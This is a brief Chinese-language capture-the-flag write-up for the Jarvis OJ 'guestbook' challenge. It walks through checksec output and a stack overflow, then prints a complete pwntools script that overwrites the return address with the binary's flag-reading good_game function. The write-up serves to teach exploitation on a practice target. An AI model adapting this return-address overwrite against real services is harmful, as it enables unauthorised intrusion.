题目信息

Do you have something to tell me?

nc pwn.jarvisoj.com 9876

guestbook.d3d5869bd6fb04dd35b29c67426c0f05

checksec

只开了NX

1
2
3
4
5
6
7
$ checksec --file guestbook
[*] '/Users/miao//CTF/PWN/guestbook/guestbook'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

静态分析

直接IDA F5,可以看到一个明显的溢出,并且有一个good_game函数

good_game函数功能为读取flag

那就很明显了,通过溢出修改返回地址为good_game,读取flag

exploit

gdb确认信息及good_game地址

构造exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

elf = ELF('./guestbook')

sh = remote('pwn.jarvisoj.com', 9876)
# sh = process('./guestbook')
context.arch = 'amd64'
context.log_level = 'debug'
good_game_addr = elf.symbols["good_game"]

payload = 'A' * 0x88
payload += p64(good_game_addr)
sh.sendline(payload)
sh.recvline()
sh.interactive()

getflag